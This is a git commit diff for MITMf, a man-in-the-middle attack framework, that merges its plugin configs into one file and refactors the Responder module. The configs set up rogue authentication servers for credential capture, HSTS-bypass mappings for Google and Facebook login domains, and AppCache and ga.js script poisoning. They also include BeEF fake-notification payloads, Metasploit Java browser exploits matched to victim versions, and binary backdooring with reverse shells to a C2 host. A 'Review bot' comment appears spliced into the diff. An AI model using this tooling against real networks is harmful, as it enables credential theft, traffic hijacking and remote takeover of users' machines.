- All config files now consolidated into a single file

- Added 'args' option in config file
- HSTS bypass is now a plugin (SSLstrip+)
- SMBAuth now defaults to specified interface IP if --host is not passed
- Modified plugins for new config support
- Changed the appoison and responder plugins to support the ConfigObj library
- Minor visual argparse changes
- Slapped santa on the head with a trout
- Gave rudolf a new nose
This commit is contained in:
byt3bl33d3r 2014-12-26 13:36:55 +01:00
parent f359ee7cdd
commit 846f85426c
24 changed files with 531 additions and 436 deletions


@ -9,6 +9,7 @@ This tool is completely based on sergio-proxy https://code.google.com/p/sergio-p
Availible plugins: Availible plugins:
- Responder - LLMNR, NBT-NS and MDNS poisoner - Responder - LLMNR, NBT-NS and MDNS poisoner
- SSLstrip+ - Partially bypass HSTS
- Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries - Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
- BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type - BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
- AppCachePoison - Perform app cache poison attacks - AppCachePoison - Perform app cache poison attacks


@ -1,53 +0,0 @@
[DEFAULT]
; HTML5 AppCache poisioning attack
; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
; generic settings for tampering engine
templates_path=config/app_cache_poison_templates
;enable_only_in_useragents=Chrome|Firefox
; when visiting first url matching following expression we will embed iframes with all tamper URLs
;(to poison the cache for all of them all at once)
mass_poison_url_match=http://.*prezydent\.pl.*
; it's only useful to mass poison chrome because:
; - it supports iframe sandbox preventing framebusting
; - does not ask for confirmation
mass_poison_useragent_match=Chrome|Safari
[test]
; any //example.com URL redirects to iana and will display our spoofed content
tamper_url=http://example.com/
manifest_url=http://www.iana.org/robots.txt ;use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
templates=test ; which templates to use for spoofing content?
skip_in_mass_poison=1
; use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
[gmail]
tamper_url=http://mail.google.com/mail/
; manifest has to be of last domain in redirect loop
manifest_url=http://mail.google.com/robots.txt
templates=default ; could be omitted
[facebook]
tamper_url=http://www.facebook.com/
manifest_url=http://www.facebook.com/robots.txt
templates=facebook ; use different template
[twitter]
tamper_url=http://twitter.com/
;tamper_url_match=^http://(www\.)?twitter\.com/$
manifest_url=http://twitter.com/robots.txt
[testing]
tamper_url=http://www.html5rocks.com/en/
manifest_url=http://www.html5rocks.com/robots.txt
; we can also modify non-HTML URLs to append malicious code to them
; but for them to be cached in HTML5 AppCache they need to be referred in
; manifest for a poisoned domain
; if not, they are "only" cached for 10 years :D
[ga]
raw_url=http://www.google-analytics.com/ga.js
templates=script
skip_in_mass_poison=1
;you can add other scripts in additional sections like jQuery etc.


@ -1,32 +0,0 @@
#Example config file for the BeefAutorun plugin
mode = oneshot
#can be set to loop, or oneshot
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
#in oneshot mode the plugin will run modules only once per hooked browser
[ALL] #Runs specified modules on all hooked browsers
'Man-In-The-Browser'= '{}'
[targets] #Runs specified modules based on OS and Browser type
[[Windows]] #Target all Windows versions using Firefox and Internet Explorer
[[[FF]]]
'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
[[[IE]]]
'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
[[Windows 7]] #Target only Windows 7 using Chrome
[[[C]]]
'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
[[Linux]] #Target Linux platforms using Chrome
[[[C]]]
'Redirect Browser (Rickroll)' = '{}'


@ -1,4 +0,0 @@
#Example config file for DHCP spoofing
ip_pool = 192.168.2.10-50
subnet = 255.255.255.0
dns_server = 192.168.2.20 #optional


@ -1,3 +0,0 @@
#Example config file for DNS tampering
www.facebook.com = 192.168.10.1
google.com = 192.168.10.1


@ -1,122 +0,0 @@
"""
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
Tested on Kali-Linux.
"""
[ZIP]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 40000000
blacklist = .dll, #don't do dlls in a zip file
[TAR]
# patchCount is the max number of files to patch in a tar file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 40000000
blacklist = , # a comma is null do not leave blank
[targets]
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads
[[ALL]] # DEFAULT settings for all targets REQUIRED
LinuxType = ALL # choices: x86/x64/ALL/None
WindowsType = ALL # choices: x86/x64/ALL/None
FatPriority = x64 # choices: x86 or x64
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
CompressedFiles = True #True/False
[[[LinuxIntelx86]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2
PORT = 8888
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
[[[LinuxIntelx64]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 9999
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[WindowsIntelx86]]]
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8443
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
MSFPAYLOAD = windows/shell_reverse_tcp
[[[WindowsIntelx64]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8088
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
ZERO_CERT = True
PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp
[[[MachoIntelx86]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 4444
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[MachoIntelx64]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 5555
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp


@ -1,11 +0,0 @@
#here you can configure your domains to bypass HSTS on
#the format is real.domain.com = fake.domain.com
#for google and gmail
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
accounts.google.se = cuentas.google.se
#for facebook
www.facebook.com = social.facebook.com
facebook.com = social.facebook.com


@ -1,27 +0,0 @@
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
[Multi] #Cross platform exploits, yay java! <3
multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
multi/browser/java_jre17_exec = 1.7.0.6
multi/browser/java_jre17_jaxws = 1.7.0.7
multi/browser/java_jre17_jmxbean = 1.7.0.10
multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
multi/browser/java_jre17_reflection_types = 1.7.0.17
multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
multi/browser/java_jre17_method_handle = 1.7.0.7
multi/browser/java_jre17_driver_manager = 1.7.0.17
multi/browser/java_jre17_provider_skeleton = 1.7.0.21
multi/browser/java_storeimagearray = 1.7.0.21
multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
[Windows] #These are windows specific
windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
windows/browser/java_mixer_sequencer = 1.6.0.18


@ -1,10 +1,355 @@
[BeEF] #MITMf configuration
[MITMf]
#here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` (assuming you config file is in the default directory)
args=''
#Required BeEF and Metasploit options
[[BeEF]]
beefip = 127.0.0.1 beefip = 127.0.0.1
beefport = 3000 beefport = 3000
user = beef user = beef
pass = beef pass = beef
[Metasploit] [[Metasploit]]
msfport = 8080 #Port to start webserver for exploits msfport = 8080 #Port to start webserver for exploits
rpcip = 127.0.0.1 rpcip = 127.0.0.1
rpcpass = abc123 rpcpass = abc123
#-----------------------------------------------------------------------------------------------------------------------------------------#
#Plugin configuration starts here
[Spoof]
[[DHCP]]
ip_pool = 192.168.2.10-50
subnet = 255.255.255.0
dns_server = 192.168.2.20 #optional
[[DNS]]
www.facebook.com = 192.168.10.1
google.com = 192.168.10.1
[Responder]
#Set these values to On or Off, so you can control which rogue authentication server is turned on.
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
##Listen on 25/TCP, 587/TCP
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
#Set a custom challenge
Challenge = 1122334455667788
#Set this to change the default logging file
SessionLog = Responder-Session.log
#Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
#RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
RespondTo =
#Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
#RespondTo = WPAD,DEV,PROD,SQLINT
RespondToName =
#DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
DontRespondTo =
#Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName =
[[HTTP Server]]
#Set this to On if you want to always serve a specific file to the victim.
Serve-Always = Off
#Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
Serve-Exe = Off
#Uncomment and specify a custom file to serve, the file must exist.
Filename = config/responder/Denied.html
#Specify a custom executable file to serve, the file must exist.
ExecFilename = config/responder/FixInternet.exe
#Set your custom PAC script
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
[[HTTPS Server]]
#Change to use your certs
cert = config/responder/certs/responder.crt
key = config/responder/certs/responder.key
[BeEFAutorun]
#Example config for the BeefAutorun plugin
mode = oneshot
#can be set to loop, or oneshot
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
#in oneshot mode the plugin will run modules only once per hooked browser
[[ALL]] #Runs specified modules on all hooked browsers
'Man-In-The-Browser'= '{}'
[[targets]] #Runs specified modules based on OS and Browser type
[[[Windows]]] #Target all Windows versions using Firefox and Internet Explorer
[[[[FF]]]]
'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
[[[[IE]]]]
'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
[[[Windows 7]]] #Target only Windows 7 using Chrome
[[[[C]]]]
'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
[[[Linux]]] #Target Linux platforms using Chrome
[[[[C]]]]
'Redirect Browser (Rickroll)' = '{}'
[AppCachePoison]
# HTML5 AppCache poisioning attack
# see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
# generic settings for tampering engine
#enable_only_in_useragents=Chrome|Firefox
templates_path=config/app_cache_poison_templates
# when visiting first url matching following expression we will embed iframes with all tamper URLs
#(to poison the cache for all of them all at once)
mass_poison_url_match=http://.*prezydent\.pl.*
# it's only useful to mass poison chrome because:
# - it supports iframe sandbox preventing framebusting
# - does not ask for confirmation
mass_poison_useragent_match=Chrome|Safari
[[test]]
# any //example.com URL redirects to iana and will display our spoofed content
tamper_url=http://example.com/
manifest_url=http://www.iana.org/robots.txt #use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
templates=test # which templates to use for spoofing content?
skip_in_mass_poison=1
[[gmail]]
#use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
tamper_url=http://mail.google.com/mail/
# manifest has to be of last domain in redirect loop
manifest_url=http://mail.google.com/robots.txt
templates=default # could be omitted
[[facebook]]
tamper_url=http://www.facebook.com/
manifest_url=http://www.facebook.com/robots.txt
templates=facebook # use different template
[[twitter]]
tamper_url=http://twitter.com/
#tamper_url_match=^http://(www\.)?twitter\.com/$
manifest_url=http://twitter.com/robots.txt
[[testing]]
tamper_url=http://www.html5rocks.com/en/
manifest_url=http://www.html5rocks.com/robots.txt
[[ga]]
# we can also modify non-HTML URLs to append malicious code to them
# but for them to be cached in HTML5 AppCache they need to be referred in
# manifest for a poisoned domain
# if not, they are "only" cached for 10 years :D
raw_url=http://www.google-analytics.com/ga.js
templates=script
skip_in_mass_poison=1
#you can add other scripts in additional sections like jQuery etc.
[JavaPwn]
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
[[Multi]] #Cross platform exploits, yay java! <3
multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
multi/browser/java_jre17_exec = 1.7.0.6
multi/browser/java_jre17_jaxws = 1.7.0.7
multi/browser/java_jre17_jmxbean = 1.7.0.10
multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
multi/browser/java_jre17_reflection_types = 1.7.0.17
multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
multi/browser/java_jre17_method_handle = 1.7.0.7
multi/browser/java_jre17_driver_manager = 1.7.0.17
multi/browser/java_jre17_provider_skeleton = 1.7.0.21
multi/browser/java_storeimagearray = 1.7.0.21
multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
[[Windows]] #These are windows specific
windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
windows/browser/java_mixer_sequencer = 1.6.0.18
[SSLstrip+]
#here you can configure your domains to bypass HSTS on
#the format is real.domain.com = fake.domain.com
#for google and gmail
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
accounts.google.se = cuentas.google.se
#for facebook
www.facebook.com = social.facebook.com
facebook.com = social.facebook.com
#-----------------------------------------------------------------------------------------------------------------------------------------#
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
#
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
#
# Copyright (c) 2013-2014, Joshua Pitts
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Tested on Kali-Linux.
#-----------------------------------------------------------------------------------------------------------------------------------------#
[FilePwn]
[[ZIP]]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 40000000
blacklist = .dll, #don't do dlls in a zip file
[[TAR]]
# patchCount is the max number of files to patch in a tar file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 40000000
blacklist = , # a comma is null do not leave blank
[[targets]]
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
LinuxType = ALL # choices: x86/x64/ALL/None
WindowsType = ALL # choices: x86/x64/ALL/None
FatPriority = x64 # choices: x86 or x64
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
CompressedFiles = True #True/False
[[[[LinuxIntelx86]]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2
PORT = 8888
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
[[[[LinuxIntelx64]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 9999
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[WindowsIntelx86]]]]
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8443
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
MSFPAYLOAD = windows/shell_reverse_tcp
[[[[WindowsIntelx64]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8088
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
ZERO_CERT = True
PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp
[[[[MachoIntelx86]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 4444
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[MachoIntelx64]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 5555
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
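Review bot: The BeEFAutorun entry for Windows 7 / Chrome carries malformed JSON — `"notification_text: "` is missing its closing quote, so parsing that module's options will fail the first time a matching browser is hooked; the line should read `'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'`, matching the Firefox entry a few lines above. The same value was already broken in the deleted beefautorun config, so the consolidation copied the defect rather than introducing it. Under FilePwn, `SUPPLIED_SHELLCODE = Nonepatchpatchpatch` for WindowsIntelx64 differs from the `None` every other target uses and looks like an editing accident; if the plugin compares against the literal `None`, this value will presumably not be treated as "unset", which is worth confirming. The comment above `RespondToName` still shows `#RespondTo = WPAD,DEV,PROD,SQLINT` as its example; `#RespondToName = WPAD,DEV,PROD,SQLINT` would match the key it documents.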


@ -1,59 +0,0 @@
[Responder Core]
;;
;Set these values to On or Off, so you can control which rogue authentication server is turned on.
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
;;Listen on 25/TCP, 587/TCP
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
;
;Set a custom challenge
Challenge = 1122334455667788
;
;Set this to change the default logging file
SessionLog = Responder-Session.log
;
;Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
;RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
RespondTo =
;Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
;RespondTo = WPAD,DEV,PROD,SQLINT
RespondToName =
;
;DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
DontRespondTo =
;Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName =
;
[HTTP Server]
;;
;Set this to On if you want to always serve a specific file to the victim.
Serve-Always = Off
;
;Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
Serve-Exe = Off
;
;Uncomment and specify a custom file to serve, the file must exist.
Filename = config/responder/Denied.html
;
;Specify a custom executable file to serve, the file must exist.
ExecFilename = config/responder/FixInternet.exe
;
;Set your custom PAC script
WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
;
[HTTPS Server]
;
;Change to use your certs
cert = config/responder/certs/responder.crt
key = config/responder/certs/responder.key
;


@ -16,7 +16,7 @@
# You should have received a copy of the GNU General Public License # You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>. # along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,ConfigParser,BaseHTTPServer, select,urlparse,zlib, string, time import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,BaseHTTPServer, select,urlparse,zlib, string, time
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer
from Fingerprint import RunSmbFinger,OsNameClientVersion from Fingerprint import RunSmbFinger,OsNameClientVersion
from odict import OrderedDict from odict import OrderedDict
@ -24,45 +24,6 @@ from socket import inet_aton
from random import randrange from random import randrange
from libs.sslstrip.DnsCache import DnsCache from libs.sslstrip.DnsCache import DnsCache
VERSION = '2.1.2'
#Config parsing
config = ConfigParser.ConfigParser()
config.read("./config/responder/responder.conf")
# Set some vars.
On_Off = config.get('Responder Core', 'HTTP').upper()
SSL_On_Off = config.get('Responder Core', 'HTTPS').upper()
SMB_On_Off = config.get('Responder Core', 'SMB').upper()
SQL_On_Off = config.get('Responder Core', 'SQL').upper()
FTP_On_Off = config.get('Responder Core', 'FTP').upper()
POP_On_Off = config.get('Responder Core', 'POP').upper()
IMAP_On_Off = config.get('Responder Core', 'IMAP').upper()
SMTP_On_Off = config.get('Responder Core', 'SMTP').upper()
LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
DNS_On_Off = config.get('Responder Core', 'DNS').upper()
Krb_On_Off = config.get('Responder Core', 'Kerberos').upper()
NumChal = config.get('Responder Core', 'Challenge')
SessionLog = config.get('Responder Core', 'SessionLog')
Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
FILENAME = config.get('HTTP Server', 'Filename')
WPAD_Script = config.get('HTTP Server', 'WPADScript')
#HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
RespondTo = config.get('Responder Core', 'RespondTo').strip()
RespondTo.split(",")
RespondToName = config.get('Responder Core', 'RespondToName').strip()
RespondToName.split(",")
DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip()
DontRespondTo.split(",")
DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip()
DontRespondToName.split(",")
HTMLToServe = ''
if len(NumChal) is not 16:
sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
def IsOsX(): def IsOsX():
Os_version = sys.platform Os_version = sys.platform
if Os_version == "darwin": if Os_version == "darwin":
@ -151,11 +112,6 @@ def PrintLLMNRNBTNS(outfile,Message):
return True return True
# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
Challenge = ""
for i in range(0,len(NumChal),2):
Challenge += NumChal[i:i+2].decode("hex")
#Packet class handling all packet generation (see odict.py). #Packet class handling all packet generation (see odict.py).
class Packet(): class Packet():
fields = OrderedDict([ fields = OrderedDict([
@ -2021,8 +1977,8 @@ class SSlSock(ThreadingMixIn, TCPServer):
def __init__(self, server_address, RequestHandlerClass): def __init__(self, server_address, RequestHandlerClass):
BaseServer.__init__(self, server_address, RequestHandlerClass) BaseServer.__init__(self, server_address, RequestHandlerClass)
ctx = SSL.Context(SSL.SSLv3_METHOD) ctx = SSL.Context(SSL.SSLv3_METHOD)
cert = config.get('HTTPS Server', 'cert') cert = SSLcert
key = config.get('HTTPS Server', 'key') key = SSLkey
ctx.use_privatekey_file(key) ctx.use_privatekey_file(key)
ctx.use_certificate_file(cert) ctx.use_certificate_file(cert)
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type)) self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
@ -2483,7 +2439,51 @@ def serve_thread_SSL(host, port, handler):
except Exception, e: except Exception, e:
print "[-] Error starting TCP server on port " + str(port) + ": " + str(e) print "[-] Error starting TCP server on port " + str(port) + ": " + str(e)
def start_responder(options, ip_address): def start_responder(options, ip_address, config):
global VERSION; VERSION = '2.1.2'
# Set some vars.
global On_Off; On_Off = config['HTTP'].upper()
global SSL_On_Off; SSL_On_Off = config['HTTPS'].upper()
global SMB_On_Off; SMB_On_Off = config['SMB'].upper()
global SQL_On_Off; SQL_On_Off = config['SQL'].upper()
global FTP_On_Off; FTP_On_Off = config['FTP'].upper()
global POP_On_Off; POP_On_Off = config['POP'].upper()
global IMAP_On_Off; IMAP_On_Off = config['IMAP'].upper()
global SMTP_On_Off; SMTP_On_Off = config['SMTP'].upper()
global LDAP_On_Off; LDAP_On_Off = config['LDAP'].upper()
global DNS_On_Off; DNS_On_Off = config['DNS'].upper()
global Krb_On_Off; Krb_On_Off = config['Kerberos'].upper()
global NumChal; NumChal = config['Challenge']
global SessionLog; SessionLog = config['SessionLog']
global Exe_On_Off; Exe_On_Off = config['HTTP Server']['Serve-Exe'].upper()
global Exec_Mode_On_Off; Exec_Mode_On_Off = config['HTTP Server']['Serve-Always'].upper()
global FILENAME; FILENAME = config['HTTP Server']['Filename']
global WPAD_Script; WPAD_Script = config['HTTP Server']['WPADScript']
#HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
global SSLcert; SSLcert = config['HTTPS Server']['cert']
global SSLkey; SSLkey = config['HTTPS Server']['key']
global RespondTo; RespondTo = config['RespondTo'].strip()
RespondTo.split(",")
global RespondToName; RespondToName = config['RespondToName'].strip()
RespondToName.split(",")
global DontRespondTo; DontRespondTo = config['DontRespondTo'].strip()
DontRespondTo.split(",")
global DontRespondToName; DontRespondToName = config['DontRespondToName'].strip()
DontRespondToName.split(",")
HTMLToServe = ''
if len(NumChal) is not 16:
sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
global Challange; Challenge = ""
for i in range(0,len(NumChal),2):
Challenge += NumChal[i:i+2].decode("hex")
#Cli options. #Cli options.
global OURIP; OURIP = ip_address global OURIP; OURIP = ip_address
